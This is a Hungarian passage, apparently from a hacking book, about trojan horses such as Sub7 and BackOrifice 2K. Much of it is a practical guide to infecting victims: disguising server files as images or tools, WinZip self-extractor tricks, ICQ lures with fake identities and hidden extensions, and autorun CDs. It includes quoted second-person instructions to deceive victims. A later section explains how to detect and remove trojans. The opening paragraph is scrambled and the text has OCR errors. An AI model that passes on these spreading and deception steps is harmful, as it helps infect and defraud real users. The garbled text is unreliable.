címeket szkennelni. az e-mail mellékleteket. mint a CD-ROM-meghajtó nyitása. és megkapja a támadáshoz szükséges IP-címet. minden kapcsolódásnál egy másik. az a támadótól függ.0 programkódjában. aki ezzel elérést kapott. Ezután igen könnyű kiolvasni remote címekből a trójai szerver IP-jét. amelyeket később még bemutatunk. A legkönnyebben úgy lehet megkaparintani az aktuális IP-t. módosította a main()-funkcókat. Szerencsére a programozás nagyon hibás volt. Ez megnehezíti a trójai szerver elérését. Ehhez a legtöbb trójainak integrált szkenneré is van. A komplex trójai programok. Amint a fertőzött számítógép kapcsolatba lép a hálózat- . Ha a szerver automatikus értesítésre van beállítva. hogy a SÁTÁN indításakor a jelszófájlba egy bejegyzés került. amelyen a SÁTÁN 1.2 A kliens otthon marad. A trójaik lehetnek programba integrálva vagy fájlokhoz fűzve (erről később többet). automatikus értesítést adnak. Ez így nagyon egyszerűen hangzik. így nem keletkeztek jelentősebb károk. Ez az eset is mutatja. illetve az internetre lép. milyen IP cím alatt. hogy a hackerek nem csak az ismert módokat. ha mondjuk átvitel közben IRC-n vagy ICQ-n keresztül. És már meg is lehet fogni a klienssel egy fertőzött számítógép szerverét. EzEgy másik lehetőség. Már csak az kell.3 Hogyan szerzik meg a hackerek az IP-t? A trójai használatához tehát szükség van a fertőzött számítógép IP-jére. Hogy a kliens milyen funkciókat tud vezérelni.n. Mivel a legtöbb felhasználó szolgáltatón keresztül létesít internetkapcsolatot. és a háttérben aktív legyen. megváltoztatta az Fpinget úgy. Az IP-címet a trójaitól és az eljárás módjától függően különböző utakon kapja meg a hacker: az ICQ-val történő elhelyezés esetén a következő kapcsolatnál közvetlenül lekérdezheti az áldozat aktuális IP-címét. a szerverfájl mindjárt el is indul. mint pl. amellyel meghatározott IP-tartományokat lehet tapogatni. Csak ezután lehet célzottan megszólítani. választják. hogy maga a hacker is online legyen a megfelelő időben. 4. és ha igen. Ezzel a programmal tud akciókat kiváltani a szerverrel a számítógépek között fennálló kapcsolaton keresztül. az a felhasznált szoftvertől függ. A szerver konfigurálásánál meg lehet határozni a klienshez küldés módjait és az akciós lehetőségeket is. hogy az áldozataikhoz jussanak. ha a fertőzött számítógép a hálózatra. dinamikus IP-címet kap.Az elhelyezésre a hackereknek és az ilyen eszközök programozóinak is rengeteg ötletük van. de nem leéli feltétlenül annak lennie. és irányítani lehet azt. Az egyik legismertebb eset egy trójai elrejtése a Linux SÁTÁN 1.2. az IP-keresés viszonylag egyszerű. Ez a lépés többnyire az elhelyezéssel egybekötve történik. és vezérli a szervert Ha egy trójai távirányítási funkciókat kínál. A különböző trójaiak leírása a továbbiakban következik.

ha az áldozatot valóban meg akarjuk téveszteni egy fájllal. hogy abból már igazi „gyűjtemény" áll össze. 4. hogy kínálja a honlapján. Ez akkor célszerű. Ezután a melt server after installation szerver opció segít. hogy könnyen és gyorsan tudják terjeszteni. tehát képekkel. Ikon-kiosztás a szervernek Olyan programnak. ha megfelelő értesítőfunkciókkal rendelkező trójait használsz. tehát EXE fájlokba. A trójaiak minden esetben veszélyesek. A szerver fájlokhoz fűzése a következő előnnyel jár: ki lehet indulni abból. . JPG. míg mások inkább csak a hobby-hackerek eszközei közé sorolhatók. hogy értesítsenek. amire szükséged van. „A szervert mail-ekén. attól függően. és más fájlokkal (képek stb.) együtt csomagolják össze a szervert. pl. hogy az áldozat mit kíván. amelybe a szervert ágyazzák. . hogy bekösd a szervert. mert ez a sikeres telepítés után azonnal törli a szervert.2 Álcázás a WinZip-pel A trójai ügyes elhelyezéséhez a világ leggyakrabban használt tömörítő programjának. amelyeket a programok egyébként is használnak: a képek JPEG fájlként megtévesztőén hasonlítanak az eredetire. így a vélt DOC fájlok egy megnyugtató Winword ikont tudnak prezentálni. amelyekkel a legkülönbözőbb fájlokkal lehet öszszekötni a konfigurált szervert. PC-felhasználóként mindenesetre ismernünk kell ezeket. ICQ-n vagy IRC-n keresztül küldjük. az IP-t. Képnek álcázzuk (valami nem gyereknek való mindig jól jön) vagy toolnak. Tedd fel hasznos programként a honlapodra. amennyiben az éppen online van. vagy mail-ben küldi el az aktuális IP-t. hogy az áldozat nem fogja gyanúsnak találni vagy rossz szándékot feltételezni arról a programról vagy a képről. Az archív ártalmatlan önkicsomagoló fájllá változik. Ehhez minden ikon felhasználható. Erről az internet idevágó fórumain olyan rengeteg információ gyűlt össze. A következőkben nemcsak az egyszerű álcázásokkal ismerkedünk meg. vagy kérj meg egy baráti webmestert. illetve az internettel.3. A profik például más programokba integrálják a trójaiakat. A veszélyes kis programok terjesztésére a legkülönbözőbb lehetőségeket agyalták ki a programozók. és mail-ben vagy ICQ-n keresztül üzenetet küldjenek neked. ha hiányoznak a programozási ismereteik. inkább más utakat választanak.1 A trójaiakat fájlokba integrálják A szervert össze lehet kötni különböző fájlokkal.tál. különösen alkalmasak az animációk és a gag-programok. hanem a hobby-hackerek eljárásaiba is betekintünk. A stratégiák egy része valóban profinak is mondható. A run command after unzipping parancs az archívból történő kicsomagolás után azonnal elindítja a szervert. olyan funkcióik vannak speciális konfigurációs fájlokban (Editserver). akkor nem rossz. pl. sőt még a szerver ikonját is meg lehet változtatni. és máris van egy tökéletesen álcázott trójai. azt persze nem kell elmondani. mert annak a szándékait uralják.3. aki a szervert vezérli." 4.3 így álcázzák és terjesztik a trójaiakat Ehhez a hálón nagyon sok program áll rendelkezésre. hogy trójait rejtettél bele. Egyes trójai kiteknek. mint például a Sub7-nek. amint az áldozat online van. Ezek arra valók. Ha már így elterjeszted a szervert a nép körében. amelyben bizonyos információkat kapsz az áldozatról és számítógépéről. a szerver átküldi az aktuális IP-t a kliensnek. vagy be lehet építeni segédprogramokba. Ezeket mindenki szívesen küldi és nézegeti. amelybe a szerver be van ágyazva. így tud a hacker célzottan rajtaütni a fertőzött számítógépen. Hogy egy pillantást vethessünk a dolgok menetére. A hobby-hackerek. 4. Ilyenkor egy új WinZip archívot készítenek. egy Defcon4 nevű hackercsoport (csak csekély mértékben módosított) szövegét fogjuk használni. a WinZip-nek a programbeállításait is használják egyes hackerek.GiF.

4 Elég egy CD és az automatikus lejátszás funkció A trójai kihelyezésének egyik kedvelt módja a CD-n keresztüli terjesztés. hiszen a kontaktlistát a beleegyezése nélkül bővítették. amilyen például a The Thing. mint egy nagyobb kép). Megkeressük az áldozatot a trójai terjesztéséhez. álcázzuk a saját identitásunkat. Férfi áldozatokhoz általában a női identitás az ideális. egyszerűen várni kell pár napot. ha kezdetnek elküldünk egy pár tiszta fájlt. valamit fecsegni. Ekkor reális az esélye annak. és hozzáfűzzük a kontaktlistához. ez a trójai túl kicsi ahhoz. Amint ez a fájl az áldozat gépén egyszer lefutott. Az ICQ Auto-Authorize/IP-Unhider-Patch megengedi UIN-ek hozzáfűzését a saját kontaktlistához. Ha egy fájlt photo. Ezzel egyidejűleg lehet online két vagy több UIN. Ezt többnyire a közeli környezetben található célok megtámadásához választják. és aztán egy nagyon kicsi fájllal megpróbálkozni. mint hacker meg hasonlók garantáltan nem fordulnak elő.inf szövege. akkor is. „Ha az áldozat tényleg gyanítja. Egy pár nap múlva azután már sokkal kisebb feltűnést kelt bármilyen állomány.3. amely egy trójaira utal . Ezen kívül az infóban minden személy IP-jét megmutatja. amelyek az ICQ-nak köszönhetően adódnak a hackereknek. megnyílik egy hátsó kapu. még mindig el lehet neki küldeni egy pár nappal később egy anonim mail-fiókról. A The Thing ezzel szemben csak kb.exe nek nevezünk el. Sokkal jobb. A legtöbb trójai a sok szolgáltatás miatt már eleve akár 400 Kbájt is lehet. Ha a fájlt visszautasítja az ICQ-n keresztül. Az áldozatot persze nem kényszerítjük. amelyben olyan fogalmak.3.4. Ha a fájl küldéséhez az ICQ-t használjuk. ha ez a funkció nálunk nincs aktiválva (az IP-ről és kiosztásáról lásd az alapismeretekről szóló fejezetet). az könnyen kiszámolhatja magának. amelyen át más fájlokat lehet feltölteni és végrehajtani. és ez nem különösebben feltűnő. A legjobb. Ilyen eset- ben már csak ártatlan kifogások segítenek. ez így megy (megint a Defcon4 „információi" szerint): Először begyűjtünk minden eszközt. A The Thing egy kis trójai. átvitelkor csak a photo. akkor amilyen jól csak lehet. hogy mi rejtőzik egy ilyen fájl mögött. anélkül.3 A trójaiakat az ICQ-val is tovább lehet adni Ön is kedveli ezt a kényelmes kommunikációs szolgáltatást az interneten? Van már egy listája kedvelt „beszélgetőpartnereiről"? Akkor valószínűleg érdekelni fogják azok a lehetőségek. A CD-ROM-on megváltoztatja az Autorun. amely lehetővé teszi az ICQ több példányának a párhuzamos indítását. Mint már mondtuk. Nos. ha generálunk egy új ICQ-UIN-t (a MICQ-val többel is online lehetünk egyszerre).jpg. hogy a másiknak ehhez engedélyt kellene adnia.jpg jelenik meg. Tehát akinek van egy kis tapasztalata. Álcázás az ICQ-val Ha lehet. Ezek az alábbiak lennének: • A Sub7 trójai (magyarázat 1. hogy elfogadja a fájlt. hogy feltűnjön." 4. 40 Kbájt (nagyjából annyi. hogy egy fájl mögött vírus vagy trójai rejtőzik. a régebbi ICQ-verziók egy kis búgját is kihasználhatjuk: ezek általában nem mutatják meg a fájlvégződéseket. A hacker ráér A szervert általában nem az első kapcsolatfelvételnél küldjük el az ICQ-n keresztül.inf fájlt. Egy Autorun. hogy az áldozat észreveszi a támadást. amire szükségünk lesz. lent) • MICQ (többször elindítja az ICQ-t) • ICQ-AutoAuthorize/IP-Unhider Patch • The Thing (kis trójai) A MICQ egy program. Ehhez egy program vagy egy játék kalózmásolatát használja a hacker.

és elindítja a Film. A közvetlen kapcsolatok az ICQ-n keresztül elsősorban a közelebbi és a távolabbi ismerősök területén könnyítik meg a terjesztést. Addig pedig a terv még csődöt is mondhat. egy vírus végülis sokkal sikeresebb. az egyik neve mondjuk Film Data. mint a rombolás. Egy nagy számban kihelyezett trójaiból beérkező adatokat természetesen ki is kell értékelni. 4. mert az ilyen tömeges fertőzések mind a tervezés. Most az editorral készít egy batch-fájlt (kötegelt parancsfájlt) a lemez főkönyvtárában. Esetünkben tehát a szervert is.Az alapelv a következő: a felhasználó beteszi a CD-ROM-ot a meghajtójába. és Film. A batch-fájl elindítja a szervert anonimitása védi a tettest. A hacker létrehoz egy mappát a lemezen. A terjesztés CD-n keresztül is inkább a hobby-hackereknek való. és erre.x automatikus lejátszás funkcióját használja ki a hacker. mind a kiértékelés/felhasználás szempontjából sokkal ráfordítás-igényesebbek. A talán legfontosabb és legsikeresebb eljárás a letöltésre kínált anyagokkal és a vírusokkal való terjesztés.MPEG fájlt). mint azt majd a következő fejezet mutatja.5 A lemezek majdnem ugyanígy működnek Ez az alapelv a lemezekre is átvihető. Fontosabbak a hálózati hozzáférési jelszavak stb. A Film Data mappába másolja a tulajdonképpeni filmet (*. amelyek magas rákattintási és ezzel installálási arányt garantálnak. Ezzel szemben egy letöltésre kínált anyagot először fáradságosán ismertté kell tenni. Az @echo parancs szolgál arra. alkalmasabbak a vírusok. hogy észrevehető lenne. És mostanra már tudják.) válik igazán vonzóvá. 4. az internet-kapcsolat . Ez utóbbinál nem kell célzott támadásokkal és hasonlókkal bajlódnia a hackernek. és támadhatóvá teszi az áldozatot. hanem egyszerűen az időfaktorra (dátumvezérlés) vagy a használati gyakoriságra (a rombolás x fájlindítás után indul) épít. a legtöbb ember ugyan kíváncsi. mert nem minden trójai kínál valóban érdekes adatokat a hackereknek.6 További terjesztési stratégiák A trójaiak terjesztésének különböző stratégiái immár világossá váltak. de technikailag nem elég képzett ahhoz. Persze azért ez a motívum sem zárható ki. Emellett természetesen terjesztési stratégiát is kell fejleszteni. 4. és ekkor a következőképpen működik. amelynek például Film a neve. mielőtt a megfelelő számú kihelyezés megtörténhetne. Ez a legegyszerűbben férgekkel (warm) érhető el. a másik Xxdata mappába másolja a szervert. anélkül. de ha csupán a nagy mértékű pusztítás a cél.inf fájl adatait és végrehajtja a fájlt. milyen stratégiákkal tudja egy hacker célzottan megközelíteni az áldozatát. hogy célzottan jelszavakat vagy hasonlókat kutasson ki. Ebben a két esetben más késztetések vannak a háttérben. hogy a levelezési címlisták minden címére elküldik magukat.3. Az adatok azonnali tönkretétele inkább személyes ellenségeskedésből fakad.3. Ebben a mappában létrehoz még két további mappát.bat néven menti. Természetesen egy trójaival jelentős károkat lehet okozni. a trójai is elindul. hogy a user előtt ne jelenjen meg a futtatás DOS-ablakban. Ha ezt a lemezt most megkapja a felhasználó. a másiké Xxdata. amely lehetővé teszi az elhelyezést világszerte több ezernyi számítógépen. Ez egy CD-ROM felismerése után azonnal kiértékeli a megfelelő Autorun. de ha belegondolunk. és a szerver automatikusan elindul a játék bevezetőjével együtt. mert a hordozó csak a tartalma révén (játék. amelynél fontosabb a hozzáférés. Ehhez a Windows 9. Az olcsó szörfözésre utaló jelszavak viszonylag érdektelenek.AVI vagy *. Egy trójait gyorsan nagy számban elhelyezni nemcsak ideális álcázást kíván .a Kurnyikova-vírus jó példa a sikert ígérő környezetekre. feltört program stb.7 Mit csinálnak a hobby-hackerek a trójaiakkal? A kérdés az első hallásra figyelemreméltóan hangzik. A trójai tulajdonképpen minden esetben olyan támadási technikát jelent. amelyek úgy szaporodnak.bat-ot.3.

1 Támad a Sub7 A Sub7 tágabb értelemben egyfajta távkarbantartó programhoz hasonlítható. A távkarbantartó szoftver. amelyek „több mint elég" fertőzött rendszert jelentenek. azaz a remote access tool vagy remote administration tool. több fájlból áll. tulajdonképpen nem is tudják. Az egyes funkciók későbbiekben történő említése bizonyosan hozzá fog járulni az ilyen szoftverből eredő potenciális veszélyek felméréséhez. Destruktív módon felhasználva. Először túrd át pár napig az áldozat gépét. akkor egyszerűen kliensként összeköttetésbe lép saját magával (a saját gép IP-je mindig 127.4 Sub7 . és tovább tanulmányozhatnád a trójai sok funkcióját. Legyetek szívesek.. fogja.exe-t. Általában kíváncsiság és egy adag vandalizmus rejtőzik a háttérben.egy trójai rémisztő lehetőségekkel A Sub7. hogy az már nem túl vidám dolog. az interneten található „szabályokból" is láthatjuk. egy ilyen szoftverrel a teljes ellenőrzést át lehet venni egy fertőzött számítógép felett.0. akik csak úgy kísérletezgetnek egy kicsit ezzel.. Ez azt jelenti. egy Mobman álnéven működő programozó „válaszaként" a NetBusra és a BackOrifice-vz. és törli a szervert!" Pillanatkép egy trójairól 4. megváltoztathatnád a startlapját. a rendszergazdák távkarbantartó és konfigurációs munkáját könnyíti meg a hálózatba kötött számítógépeken.A legtöbben azonban. mint a Sub7. azt az úgynevezett portszkennek mutatják. amint azt a következő. Amint hozzáférünk az áldozat adataihoz.azért ez förtelmes lenne. amelyek egymáshoz kapcsolódva gondoskodnak a támadó gép és a fertőzött gép kapcsolatáról. Én személy szerint teljes mértékben az adatmegsemmisítés ellen vagyok. nem?" Önfertőzés ügyetleneknek Azoknak a hobby-hackereknek. Ismert remote access program pl. \windows\netstat. információkat fűzhetnél dokumentumokhoz. 1999 márciusában került a hálóra az első verziókban. hogy a megfelelő kliens tulajdonosa minden olyan funkciót végrehajthat a fertőzött gépen. a PCAnywher a Symantectől. Egy olyan trójai. egy backdoor-trójai. Ezzel a Windows programmal viszont minden hálózati kapcsolatot meg lehet nézni.01!). a következő tanácsot tartja készenlétben az internet: „Ha az ember az első fertőzési kísérleteknél saját magát fertőzi meg. és nézd meg az összes adatát. Hogy világszerte milyen sok rendszer volt Sub7-tel fertőzött. „Ha sok fantáziával és több ICQ-UIN-nal végre sikerült egy trójait elültetnünk az áldozat számítógépén. Azóta ez a backdoor-tool folyamatosan tökéletesedik és új funkciókkal bővül. 4. nem kell mindjárt nekikezdeni a mulatságnak. illetve hogy még most is az. ha fontos adatokat veszítünk el. Áthelyezhetnél fájlokat. A Sub7 a legkomolyabb és a neten legelterjedtebb trójaiak közé tartozik. . amit a gép tulajdonosa is megtehet. Mindannyian tudjuk. akik kísérletezés közben saját magukat fertőzik meg trójaival. ne nagyon bántsátok az áldozat adatait.4. nagyobb hálózatokban. elsőként töröljük a C. hogy valójában mit is akarnak kezdeni az áldozat gépén.

5 BackOrifice 2K .Hálózati eszköz vagy támadás a Microsoft ellen 1998. hogy a szerver közvetlenül a telepítés után azonnal elinduljon-e. A BackOrifice célja . Különösen ennek kellett a BO2K-t érdekessé tenni a hálózati rendszergazdák számára. bár azt nem ismerték el. 4. Ennek a modulnak tehát feltétlenül telepítve kell lennie az irányítandó rendszerre ahhoz. És ehhez a program nem a Windows operációs rendszer valamiféle búgjait vagy belső dokumentálatlan API-jeit használja. és új képességekkel bővítette. amelyről a trójai kommunikál (az újabb verziókban véletlenszerű is lehet . Ehhez jönnek egyes ICQ-beállítások (értesítés. mert a BackOrifice ezután is az egyik legkedveltebb trójai maradt. Azt is meg lehet adni. a port. hogy a műveleti konzolok (kliens) között kapcsolatot teremtsen. Pillantás a Sub7 váltóközpontjára Minden működést a kliens irányít A kliensre azért van szükség. amelyekről egészen kényelmesen el lehet indítani az egyes funkciókat. A Microsoft válasza nem váratott magára sokáig. . hogy az átvitt adatok egy harmadikhoz kerüljenek. amely csaknem lehetetlenné teszi. Edit-Server Az Edit-Server egy kiegészítő program. A Sub7-nek kapcsolata van a szerverre! így előkészítve sokféleképpen közelíti meg a támadó az áldozatát. továbbá itt lehet meghatározni a szerver nevét is. menükkel és kiválasztómezőkkel. grafikus felülettel. hogy a trójai egyes funkcióit inicializálja.A Sub7 szervere A szerver ahhoz szükséges. hogy Sub7-es fertőzöttségről lehessen beszélni. és megkísérli a célrendszerre telepíteni a szervert. és hogy egy másik futtatható fájlhoz kapcsolódjon-e. Las Vegasban. A CDC ezzel a verzióval „trójainak" kikiáltott programjának a hírén akart javítani.itt a port a futási időben derül ki).a Windows 95/98 alatti súlyos biztonsági hiányosságok feltárása. és irányítsa a fertőzött gépet. Egy ügyesen programozott kliens/szerver alkalmazásról volt szó. így például a magasfokú titkosítással. A hackereket azonban ezek a dolgok nem nagyon érdekelhették. és hogy a felhasznált port rejtve legyen-e. hanem kizárólag dokumentált Windows funkcióhívásokat. amely trójai falóként észrevétlenül tudott futni egy Windows 9x operációs rendszeren. UIM-kicsomagolás). amellyel a szervert lehet konfigurálni. augusztus elején mutatta be a texasi Cult of the Dead Cow hackercsoport a BackOrifice Windows Remote Administration Tool-t egy hackertalálkozón. hogy miként telepítse magát a célgépre a szerver. hogy Windows 9x alatt biztonsági problémák lennének. Itt lehet például rögzíteni. A klienst teljesen hagyományos Windows-programként kell elképzelni. Ugyanezen év augusztus 7-ig a programot több mint 35 ezerszer töltötték le a CDC honlapjáról. hogy az a szervert az installáció előtt elrejtse. jelszókikémlelés. és ezzel irányítóközpontként működhessen. gombokkal. A 2000-ben a Cult of the Dead Cow (CDC) kihozta a BackOrifice új verzióját: a BO2K-t.állította a hackercsoport .

amelyen a szerver és a kliens összekapcsolódnak. Ezt a gyártók gyakran nem állítják be előzetesen. hogyan lehet felismerni és leküzdeni egy rendszerben a trójai vírusokat. amelyek jelentősen megkönnyítik a standard trójaiak felkutatását. inkább kérjünk tanácsot szakembertől. hogy a Minden fájl ellenőrzése vagy hasonló funkció aktív legyen.mint mondtuk . Mielőtt a kliens a szerverrel kapcsolatba tudna lépni. de ez kódolja a TCP-csomagok headerét. mert a szkennelés így túl sokáig tarthat. a Rattler mailben elküldi az áldozat IP-jét. hogy a számítógép tiszta. Mobman például beépített egy ilyen funkciót a Sub7-be. Ha a vírusvizsgáló fertőzést talál. Ezzel a programmal lehet fontos beállításokat (kódolás. hiszen szinte naponta fedeznek fel új trójaiakat. illetve a Registry-be. A Registry-be is bejegyzi magát úgy. Az IP (ez a címe egy PC-nek az interneten) is szükséges a kliens és a szerver öszbo2kcfg. A SERPENT feladata. hogy minden Windows-indításkor automatikusan aktiválódjon.és megtévesztheti a víruskeresőt. Hogy az ilyen esetekben mit tehetünk.6 így ismerjük fel a trójait a rendszerünkben Most. így ezeket nem lehet BO2Kadatforgalomként (Traffic) felismerni. hogy fájlokat lehessen kicserélni. felmerül a kérdés. A trójai rejtőzködhet . srv_rattler. bo2kgui. Továbbá feltétlenül szükséges. illetve karanténba tenni. Ez a plugin gondoskodik arról.dll Funkció Lényegében ezek a szerver alapfunkciói. amelyen a rendszerkönyvtárba másolódik stb. A gyakorlatlan felhasználónak ez nehéznek tűnhet.1 A BO2K és összetevői íme egy áttekintés a legfontosabb fájlokról és funkcióikról a távkarbantartási funkciók és a trójai működés komplex együttműködésében. az még messze nem jelenti azt.6. A grafikus felhasználói felületen keresztül lehet a fertőzött PC-t távirányítani.1 Vírus. Az első vizsgálat előtt figyeljünk arra. 4. hogy ez állandóan aktualizálva legyen.exe A kliens a BO2K „látható" része. automatikusan a C:\Windows\System könyvtárba másolja magát. hogy az adatok kódoltan közlekedjenek a kliens és a szerver között.) végezni a szerveren. Vannak azonban olyan programok. Arra is figyelnünk kell. A BO2K legfontosabb fájljaihoz jön még néhány plugin: Fájl bo2k_inetcmd.dll enc_serpent. hogy elkerüljük az esetleges károkat. és kisebb bővítéseket (pluginek) hozzáfűzni. A szervert kiegészítő részekkel (pluginek) még bővíteni lehet. anélkül. hogy különösebb ismeretekre lenne szükség róla.).5. a szerver neve. Ez a plugin az első pillantásra ugyan nem nyújt új lehetőségeket. hogy a trójai falovak bevetésének a lehetőségei és potenciális veszélyei ismertté váltak.tekintsünk el az érintett fájlok törlésétől. Fájlok és funkcióik együttműködése 4.4. . a gép már megfertőződött. a megtisztítás különböző lehetőségeit fogja javasolni.és trójai-szkenner Alapvetően minden rendszerben mindig kell telepített vírusvizsgálónak lennie. Ezért szeretnék itt néhány lehetőséget bemutatni. és ez a vírusvizsgálónak jelentős problémákat okozhat.exe szekötéséhez. néhány dolgot még be kell állítani rajta (jelszó stb. Ha a szerver csak egyszer is elindul. port.vagy jobban mondva: a gép totál lefagy. Ha elindul. Ha nem vagyunk biztosak magunkban. mivel az ilyen programok keresése gyakran beavatkozásokat igényel a rendszerbe. A trójaiak leküzdésének most következő módjánál nagyon óvatosnak kell lennünk. azt a következő szakasz részletezi.dll io_stcpio. hogy a szkenner ne törölje azonnal a fertőzött fájlokat. hogy a rendszer használhatatlanná válik .exe Funkció Ez a szerver. nem vagyunk-e már magunk is fertőzöttek. Sőt bizonyos esetekben még ahhoz is vezethet. Ha a vírusvizsgáló nem talál fertőzött fájlokat. Fájl bo2k. Először . mert egyes trójaiak szerzői biztonsági intézkedéseket építettek a programjaikba az eltávolításnak e módja ellen. Próbáljuk meg a fájlokat izolálni.dll B02K pluginek Ez a plugin látja el az értesítési funkciókat: ha a szerver elindult.

mint a Windows NT. Számos más Registry-bejegyzési lehetőség is előfordul autorun célból. A control. De persze a parancsokat többnyire rengeteg üres karakterrel álcázzák a paraméter-megnevezések mögött. backup programok stb. A trójaiak ritkán használják ezt a lehetőséget. System. A System. A sysedit-tel is sokat megtalálhatunk a fentiek közül.exe-vel lelhető fel. Ezeket a trójaiakat azonban nehéz realizálni. vírusvizsgálók. uninstallprogramok. amelyet az utolsó rendszerindítás előtt töröltek. ez rendszerint azt jelenti: egy parancssor egy fájl másolását írja elő.kevésbé valószínű Klasszikus változat az automatikusan indítandó programok indítására az autostart (Indítópult)-mappa.sys . Hogy ezt kizárjuk. autoexec. Szükség esetén távolítsuk el a gyanús bejegyzéseket. mint az msconfig-nál.ini-t. hát megemlítjük. ezt semmiképpen se töröljük! Az Explorer. Hasznos segítség a Windows saját msconfig programja is. Az indulásnak ezt a lehetőségét a rendszerindítással együtt sok ártalmatlan program (pl. Eddig alig ismertek olyan trójaiak.elég ritka Ebben a fájlban a shell= paraméter alatt fordulhat elő bejegyzés. mert ide is bejegyzi magát néhány ártalmatlan program. Óvatosan! Itt már van egy Explorer. és esetleg programokat. Járjunk el úgy. Ez az indítási lehetőség azonban nagyon valószínűtlen.ini a Windows 3. és egy trójait indíthatnának el. config.exe-t. hogy online kapcsolat esetén kész legyen parancsokat fogadni a klienstől.4. A config. hogy ne legyenek rögtön láthatóak. aztán a Futtatás-ra.exe nevű bejegyzés.6. Menjünk egyszerűen a Start gombra. Nézzük meg a Load és a Run paraméterek mögötti bejegyzéseket. Az autoexec. Ez azt jelenti. kis rizikófaktorral Itt is óvatosnak kell lenni a törléssel. Itt aztán szokatlan dolgok után kell kutatni. Autostart (Indítópult)-mappa . míg a sor végét is látjuk.ini .3 Windows Registry . amelyek ezt az utat használnák. .exe után azonban még további bejegyzések következhetnek.ez már izgalmas A regisztrációs adatbázisban megnevezett útvonalak mappákként jelennek meg. amelyeket nem ismerünk.2 AutoRun bejegyzések Egy trójai csak akkor működik. mielőtt bármit is törölnénk. Ezzel a programmal a fent nevezett bejegyzések közül sokat ellenőrizhetünk. ha a rendszerindítással együtt elindul. az illető ikonra duplán kattintva érjük el őket. de nagyon ritka Ha a winstart.ini-ben is el lehet helyezni egy bejegyzést az automatikus indítás céljából. és szerencsére nagyon ritkák is. winstart.bat vagy control. Az Indítópultot a következőképpen lehet ellenőrizni: közvetlenül a Start menüből: Start Programok Indítópult vagy C:\Windows\Startmenu\ProgramokMndítópult. de persze ezeket (szerencsére) csak ritkán használják a trójaiak. illetve parancsikonokat kell törölni. Itt megintcsak ajánlatos az óvatosság.6. és írjuk be msconfig.lehetséges.bat . mert nagyon nagy a felfedezés valószínűsége.DOS-os hulladék. Az olyan rendszereknél. hogy a szervernek a rendszer hátterében állandóan futnia kell.sys szintén a sysedit. Gördítsük az alsó gördítősávot egyszerűen jobbra. A Win.bat-ban felismerhető egy bejegyzés. írjuk be a Start/Futtatásba a sysedit.de ez is nagyon ritka. 4.x-es időkben volt érdekes Régebben nagyon kedvelt módszer volt a Win. Mivel azonban ez a lehetőség is adott.ini bejegyzésein keresztül indítani a trójaiakat.csak a szokatlan eszközmeghajtók veszélyesek Néhány ritka trójai a Windows 95/98-s rendszerek eszköz-meghajtójaként is álcázza magát. mint a Win.ini .exe-vel lehet megnézni és szerkeszteni. helyette azonban ezt írjuk be: sysedit. Több ablak is megnyílik szövegszerkesztő formában. a mappát a felhasználói profilokon keresztül lehet megtalálni (C:\WinNT\Profiles\ Username \Startmenü\Programok \Indítópult).bat-ot is a sysedit. és kényelmesen megváltoztathatunk. de a trójaiak is.) is használja.ini-t ugyanúgy nyitjuk meg szerkesztésre.

hanem csak a program nevét! ICQ-usereknél fennáll egy további lehetőség a következő bejegyzésnél: Registry Installed Components Vannak még az úgynevezett „Unknown-módszerek". Rendszerint azonban csak az itt megnevezett bejegyzések vannak. Itt is a Windows Registryt használják a program automatikus indításához. aminek a törlése rendszerproblémákat okoz. a shell paraméterrel. Ha valamelyik kulcs még egy futtatható fájlt is tartalmaz. amögött egy trójai rejtőzhet. Eszközmeghajtónak álcázás Egy trójai. eszközmeghajtónak is álcázhatja magát. Itt is egy Registry-be került bejegyzést keresünk. Végülis lehet az egy valódi meghajtó is. illetve a Windows-regisztráció. azonban egy „szokatlan" path-on: .Következőként hívjuk meg a Rendszerleíró adatbázis-szerkesztőt a Start/Futtatás/Regedit-tel. Ilyen esetben nem egyszerű a pontos azonosítás. Gyanú esetén ne az egész bejegyzést távolítsuk el. mint már említettük. Ezek közül csak néhány útvonal érdekes: A „%1" %*" karakterek elé be lehetne írni még egy programot. Ezek alatt az útvonalak alatt a következő bejegyzések találhatók: Registry Common Startup kulcs A bejegyzés általában Ez alatt az útvonal alatt található a szerver is. Megnyílik egy program félelmetesen sok bejegyzéssel.

4. Az explorer. Az eredeti runonce. megtalált explorer. és először elvégez néhány vizsgálatot. hogy kell elrejtőzni a Taskmanager elől.6. amely így lehetővé tesz egy autorun eljárást. Itt futtatható fájlokról van szó. amelynek más a mérete.5 A runonce. Ez a módszer azonban egyáltalán nem biztos.com/ weboldalon található.exe-t egy módosított fájlra cseréli.0 trójai leírását. A program neve: DrWatson. Kezdőknek azonban a DrWatson bonyolultnak tűnhet.exe-t. akkor itt is el lehet rejtve egy trójai.exe kicserélése Csak a Schoolbm trójainál ismert. ami a Windows alatt adódik. Ezeket különböző módokon lehet megfigyelni.4 Módszerek az Explorer. és válasszuk a Mindent megmutat opciót.exet futtatja le (kétséges esetben a C:\ könyvtárban). A Start menü Futtatás-ba írjuk be: drwatson. A Windows-zal azonban egy jó kis eszközt is kapunk a futó folyamatok ellenőrzéséhez. .exe (C:\windows\) elindulna.4.exe mérete a Windows 95 alatt 11264 bájt. Tehát ha találunk egy runonce. amely a http://serdarka. Windows 98/ME alatt pedig 40960 bájt. hogy legközelebb egy trójai töltődik be. Az eredeti Windows runonce.exe-vel a C:\ meghajtóra Egy bug miatt a Windows először mindig az első. amely a C:\windows\system könyvtárban vagy máshol található.8m. LEHET! Ennek a módszernek a további magyarázatához az angolul értők olvassák el a Schoolbus 2. amelyet a Taskmanager-rel együtt lehet elindítani. hogy a „futó feladatokat" ellenőrizzük. Például a Ctrl+Alt+Del billentyűkkel. A program elindul. mert tényleg mindent könyörtelenül megmutat. A Windows 2000-be is integráltak egy nagyon jó folyamat-nézőkét.6. amelyeket ennek megfelelően be is lehet zárni. mert a legtöbb trójai „tudja". Menjünk a Nézet menüpontra.exe a C:\ -n azt eredményezhetné. amely mutatja a futó programokat. Hangsúlyozzuk. mielőtt a tulajdonképpeni explorer. Megjelenik egy ablak. amelyek a rendszerrel „együtt futnak". „Futó folyamatok ellenőrzése" módszer Gyakran lepleződik le egy trójai úgy.

